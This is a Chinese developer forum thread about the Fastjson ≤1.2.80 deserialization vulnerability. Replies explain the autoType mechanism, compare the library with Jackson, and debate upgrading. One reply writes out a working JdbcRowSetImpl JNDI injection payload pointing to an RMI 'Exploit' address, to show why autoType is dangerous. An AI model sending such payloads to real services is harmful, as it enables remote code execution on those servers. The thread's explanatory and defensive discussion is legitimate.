V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
twofox
V2EX  ›  Java

Fastjson 反序列化漏洞 影响版本≤1.2.80

  •  1
     
  •   twofox · 192 天前 · 3832 次点击
    这是一个创建于 192 天前的主题,其中的信息可能已经有所发展或是发生改变。

    近日 Fastjson Develop Team 发现 fastjson 1.2.80 及以下存在新的风险,请关注。 fastjson 已使用黑白名单用于防御反序列化漏洞,经研究该利用在特定条件下可绕过默认 autoType 关闭限制,攻击远程服务器,风险影响较大。建议 fastjson 用户尽快采取安全措施保障系统安全。

    这个影响是不是有点大。我司目前还在用 1.2.34 ( CSDN 都有复现教程了

    但是我同时有点好奇,这些漏洞怎么样去利用的?有什么论坛是交流这些的吗

    我是 web 开发,并非网络安全方向,所以不太懂

    22 条回复    2022-05-26 05:04:38 +08:00
    ychost
        1
    ychost  
       192 天前   ❤️ 1
    fastJSON 几乎所有的漏洞都和 autoType 有关,这玩意儿大部分都用不到,关了之后就没啥问题,它主要解决的是反序列化的类不确定,比如 {"@type":"com.abc.biz.Label","name":"","value":""},那么反序列化的时候就会去用 classLoader 加载 com.abc.biz.Label 这个类,如果这个类被故意攻击,用到了 jdbc 里面的类,然后就比较危险了,比如 {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}
    就能加载远程 dataSource 了,个人建议能关 autoType 就关掉,想用的话开白名单模式
    golangLover
        2
    golangLover  
       192 天前 via Android
    没发现漏洞才是新闻吧。


    还跟多国内文章推荐这个,害人不浅
    pengtdyd
        3
    pengtdyd  
       192 天前
    不知道是第 N 次听到出漏洞的消息了
    sagaxu
        4
    sagaxu  
       192 天前   ❤️ 1
    这货有哪一年不出这类漏洞?
    yangyaofei
        5
    yangyaofei  
       192 天前
    @ychost 这个 type 貌似很多序列化库都有, 比如 jackson, 虽然但是, 我用 jackson...
    Greatshu
        6
    Greatshu  
       192 天前
    现在还在用 fastjson 的一定是个加班爱好者
    DreamSaddle
        7
    DreamSaddle  
       192 天前
    白学家:不会吧,不会吧,还有人敢用这玩意?
    chendy
        8
    chendy  
       192 天前
    人生苦短,我选择 spring boot 默认的 hikari 和 fastjson ,能少配一点是一点
    不过是代码就有漏洞,及时更新其实都没事
    oneisall8955
        9
    oneisall8955  
       192 天前 via Android
    @chendy springboot 默认 jackson 吧?
    chendy
        10
    chendy  
       192 天前
    @chendy @oneisall8955 上班摸鱼手滑了……
    Saxton
        11
    Saxton  
       192 天前
    @Greatshu 996 福报警告
    potatowish
        12
    potatowish  
       192 天前 via iPhone
    默认自带的 jackson 它不香吗,为什么还要单独引入 fastjson
    0xfan
        13
    0xfan  
       192 天前
    累了,就这样吧,有漏洞就有吧,躺平了 [/狗头]
    f64by
        14
    f64by  
       192 天前   ❤️ 1
    以前在 README 里写 gson 是龟 son 缩写的,就是 fastjson 干的吧
    xuanbg
        15
    xuanbg  
       192 天前
    反序列化的时候不能确定目标类型的话,肯定是设计问题,只要完善设计,就可以规避这种问题了。所以,fastjson 这个 autoType 功能真的就是画蛇添足。
    zmal
        16
    zmal  
       192 天前
    @xuanbg 怎么规避?请指教。
    AllenHua
        17
    AllenHua  
       192 天前
    Fastjson 到底做错了什么?为什么会被频繁爆出漏洞? https://www.163.com/dy/article/FGV541KF05319WXB.html

    [高危安全通告] fastjson≤1.2.80 反序列化漏洞 https://juejin.cn/post/7101506799387279396
    AllenHua
        18
    AllenHua  
       192 天前
    不过实际项目中,我挺喜欢用 fastjson 的啊(我是异类,狗头
    hhjswf
        19
    hhjswf  
       192 天前
    5. 怎么判断是否用到了 autoType
    看序列化的代码中是否用到了 SerializerFeature.WriteClassName

    这东西基本没用到吧?管它呢,不升级。。
    dbpe
        20
    dbpe  
       191 天前
    唉..很多漏洞都是默认开启一些 xxx...实际上我们根本用不到....
    shuang
        21
    shuang  
       191 天前
    @hhjswf 虽然心里有点慌,我也是选择先不升级吧,怕升级后再出现什么不兼容的问题影响就大了
    xuanbg
        22
    xuanbg  
       191 天前
    @zmal 不要过度抽象。什么时候连泛型都解决不了问题,那肯定就是过度抽象了。
    关于   ·   帮助文档   ·   API   ·   FAQ   ·   我们的愿景   ·   广告投放   ·   感谢   ·   实用小工具   ·   3006 人在线   最高记录 5497   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 183ms · UTC 08:49 · PVG 16:49 · LAX 00:49 · JFK 03:49
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.